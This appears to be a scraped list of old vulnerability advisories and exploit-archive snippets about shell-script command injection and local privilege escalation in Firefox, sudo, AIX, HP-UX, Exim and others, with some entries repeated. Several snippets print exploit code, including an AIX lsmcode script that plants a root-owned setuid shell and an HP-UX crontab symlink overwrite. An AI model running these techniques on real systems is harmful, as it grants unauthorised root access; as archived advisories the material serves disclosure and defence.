[SA18963] Mac OS X "__MACOSX" ZIP Archive Shell Script Execution

TITLE: Mac OS X "MACOSX" ZIP Archive Shell Script Execution SECUNIA ADVISORY ID: SA18963 VERIFY ADVISORY: http://secunia.com/advisories/18963/ CRITICAL: Extremely critical IMPACT: System access WHERE: From remote OPERATING SYSTEM: Apple Macintosh OS X http://secunia.com/product/96/ DESCRIPTION:...

Ubuntu 4.10 : sudo vulnerability (USN-28-1)

Liam Helmer discovered an input validation flaw in sudo. When the standard shell 'bash' starts up, it searches the environment for variables with a value beginning with ''. For each of these variables a function with the same name is created, with the function body filled in from the environment...

Mozilla Firefox fails to properly sanitize user-supplied URIs via shell script

Overview A lack of input validation in a supplemental shell script included with some Mozilla browsers may allow a remote, unauthenticated attacker to execute arbitrary commands. Description The Linux versions of the Mozilla Firefox and Mozilla Suite web browsers include a wrapper shell script fo...

Firefox Command Line URL Shell Command Injection

Secunia Advisory: SA16869 Release Date: 2005-09-20 Critical: Extremely critical Impact: System access Where: From remote Solution Status: Vendor Patch Software: Mozilla Firefox 1.x Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it. CVE reference:...

firefox & mozilla -- command line URL shell command injection

A Secunia Advisory reports: Peter Zelezny has discovered a vulnerability in Firefox, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to the shell script used to launch Firefox parsing shell commands that are enclosed within backticks in th...

x_aix5_bellmail.pl.txt

-bash-2.05b$ -bash-2.05b$ cat xaix5bellmail.pl !/usr/bin/perl FileName: xaix5bellmail.pl Exploit "Race condition vulnerability BUGTRAQ ID: 8805" of /usr/bin/bellmail command on Aix5 to change any file owner to current user. Usage : xaix5bellmail.pl aimfile aimfile : then file wich you want to cho...

FreeBSD : konversation -- shell script command injection (5c7bb4dd-6a56-11d9-97ec-000c6e8f12ef)

Konversation comes with Perl scripts that do not properly escape shell characters on executing a script. This makes it possible to attack Konversation with shell script command injection. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text and package checks in this plugin...

CVE-2005-0018

The f2 shell script in the f2c package 3.1 allows local users to read arbitrary files via a symlink attack on temporary files...

CVE-2005-0018

The f2 shell script in the f2c package 3.1 allows local users to read arbitrary files via a symlink attack on temporary files...

CVE-2005-0018

The f2 shell script in the f2c package 3.1 allows local users to read arbitrary files via a symlink attack on temporary files...

Exim 4.42 - Local Privilege Escalation

!/bin/sh Local Lame R00T sploit for exim include int mainint argc, char argv char addrptr; addrptr = getenvargv1; printf"%s @ %p\n", argv1, addrptr; return 0; gcc @env.c -o @env cp @env /usr/bin cd /usr/exim/bin CODE=perl -e 'print...

CVE-2005-0018

CVE-2005-0018 concerns the f2c package (f2 shell script) where a symlink attack on temporary files allows a local user to read arbitrary files. Affected feature is the f2 script in the f2c package version 3.1, with root cause outlined as a symlink-based local file read. The impact is limited to c...

CVE-2005-0018

The f2 shell script in the f2c package 3.1 allows local users to read arbitrary files via a symlink attack on temporary files...

konversation -- shell script command injection

Konversation comes with Perl scripts that do not properly escape shell characters on executing a script. This makes it possible to attack Konversation with shell script command injection...

AIX 4.35.1 5.3 - lsmcode Execution Privilege Escalation

AIX 4.35.1 5.3 - lsmcode Execution Privilege Escalation mkdirhier /tmp/aap/bin export DIAGNOSTICS=/tmp/aap cat /tmp/aap/bin/Dctrl EOF !/bin/sh cp /bin/sh /tmp/.shh chown root:system /tmp/.shh chmod u+s /tmp/.shh EOF chmod a+x /tmp/aap/bin/Dctrl lsmcode /tmp/.shh milw0rm.com 2004-12-21...

CVE-2002-1109

securetar, as used in AMaViS shell script 0.2.1 and earlier, allows users to cause a denial of service CPU consumption via a malformed TAR file, possibly via an incorrect file size parameter...

[SECURITY] [DSA-078-1] slrn command invocation

Package : slrn Problem type : remote command invocation Debian-specific: no Byrial Jensen found a nasty problem in slrn a threaded news reader. The notice on slrn-announce describes it as follows: When trying to decode binaries, the built-in code executes any shell scripts the article might...

cnn_unsubscribe_bot.txt

CNN List Un-Subscribe bot Date: 8/22/01 Author: Jay Daniels PROBLEM: Anyone can Un-Subscribe other users from CNN's distribution list by placing a random number at the end of unsubscribe cgi URL's memberid. CAUSE: There is no confirmation request! I can't remember if there is a confirmation reque...

HP-UX 11.0010.20 crontab - Overwrite Files

HP-UX 11.0010.20 crontab - Overwrite Files !/bin/sh HP-UX 11.00/10.20 crontab Kyong-won,Cho [email protected] Usage : ./crontab.sh if -z "$1" then echo "Usage : $0 " exit fi cat /tmp/crontabexp !/bin/sh ln -sf $1 $1 EOF chmod 755 /tmp/crontabexp EDITOR=/tmp/crontabexp export EDITOR crontab -e ...

killmod-0.69.lsm

killmod-0.69 killmod.php3 is a php front end that calls a simple shell script killmod.sh and allows you to use the +++ath0 bug to hang up older modems. ------------------------------------------------------------------------------------------------ killmod-0.69.tar.gz contains: --- README...